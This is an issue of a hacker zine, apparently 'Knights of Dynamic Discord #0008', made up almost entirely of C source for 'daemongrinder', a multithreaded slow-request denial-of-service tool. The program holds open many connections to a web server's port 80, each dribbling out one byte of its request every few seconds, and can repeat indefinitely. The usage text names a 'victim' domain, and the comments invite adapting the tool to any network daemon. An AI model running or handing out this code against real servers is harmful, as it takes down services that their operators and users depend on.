THE


                  _  __      _       _     _                __ 
                 | |/ /     (_)     | |   | |              / _|
                 | ' / _ __  _  __ _| |__ | |_ ___    ___ | |_ 
                 |  < | '_ \| |/ _` | '_ \| __/ __|  / _ \|  _|
                 | . \| | | | | (_| | | | | |_\__ \ | (_) | |  
                 |_|\_\_| |_|_|\__, |_| |_|\__|___/  \___/|_|  
                                __/ |                          
                               |___/                           
  _____                              _        _____  _                       _ 
 |  __ \                            (_)      |  __ \(_)                     | |
 | |  | |_   _ _ __   __ _ _ __ ___  _  ___  | |  | |_ ___  ___ ___  _ __ __| |
 | |  | | | | | '_ \ / _` | '_ ` _ \| |/ __| | |  | | / __|/ __/ _ \| '__/ _` |
 | |__| | |_| | | | | (_| | | | | | | | (__  | |__| | \__ \ (_| (_) | | | (_| |
 |_____/ \__, |_| |_|\__,_|_| |_| |_|_|\___| |_____/|_|___/\___\___/|_|  \__,_|
          __/ |                                                                
         |___/  


                                     #0008






                  And in our names, thou shall cast down Daemons.






<code>


/*           daemongrinder.c - ver0.1 proof of concept           */
/*	  gcc daemongrinder.c -o daemongrinder -pthread	         */
/*****************************************************************/
/***************** danger will robinson danger *******************/
/*****************************************************************/

/*			by Erik the 1st				 */

// this is a poc attack against http daemons, the concept can easily
// be reworked to attacked any network daemon. i'll leave that as an
// exercise for the reader. all hail eris, all hail discordia!


#include <pthread.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

char *host;
#define MAXDATASIZE 500
#define	SECONDDELAY 5
#define THREADCOUNT 50	//go wild ;]

char request[] = "GET / HTTP/1.0\r\nUser-Agent: daemongrinder\r\n\r\n";



void *thr_sub(void *arg)
{
	//this is where the magic happens
	char *victim;
    int x, sockfd, numbytes;
    char buf[MAXDATASIZE], t[2];
    struct hostent *he;
    struct sockaddr_in their_addr;
    pid_t pid;

	victim = (char *) arg;

    if ((he=gethostbyname(victim)) == NULL) {
        herror("gethostbyname");
        return 0;
    }

    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        return 0;
    }

    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(80);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
        perror("connect");
        return 0;
    }

	printf("Thread connected\n");

	//send request _slowly_
	for (x=0; x<strlen(request); x++) {
		if ((numbytes=send(sockfd, &request[x], 1, 0)) == -1) {
			perror("send");
    	    return 0;
    	}
    	sleep(SECONDDELAY);
	}

	printf("Data sent\n");

    if ((numbytes=recv(sockfd, buf, MAXDATASIZE-1, 0)) == -1) {
        perror("recv");
        return 0;
    }

    buf[numbytes] = '\0';
    //printf ("%s\n", buf);

    printf("Closing connection\n");
    sleep(SECONDDELAY*2);
    if (sockfd) close(sockfd);

    return 0;
}


//command line: daemongrinder <host> <number of threads>
int main (int argc, char *argv[]) {
	int i, iret, x, y, loop;
	char buf;
	pthread_t threads[THREADCOUNT];

	if (argc != 3) {
		printf ("\nusage - ./daemongrinder <host> <loop>\n");
		printf ("<host> is the victim domain name such as www.phrack.org\n");
		printf ("<loop> is a bool - either 0 or 1 to decide if daemongrinder should keep running\n\n");
		_exit(-1);
	}

	//host
	i = strlen(argv[1]);
	host = (char *) malloc (i+1);
	strncpy (host, argv[1], i);

	//check for loop
	loop = atoi(argv[2]);

spagetti:
	//create threads
	for (x=0; x<THREADCOUNT; x++) {
		iret = pthread_create (&threads[x], NULL, thr_sub, (void*) host);
	}

	for (y=0; y<THREADCOUNT; y++) {
		pthread_join (threads[y], NULL);
	}
	if (loop) goto spagetti;

	exit(0);
}

</code>


EOF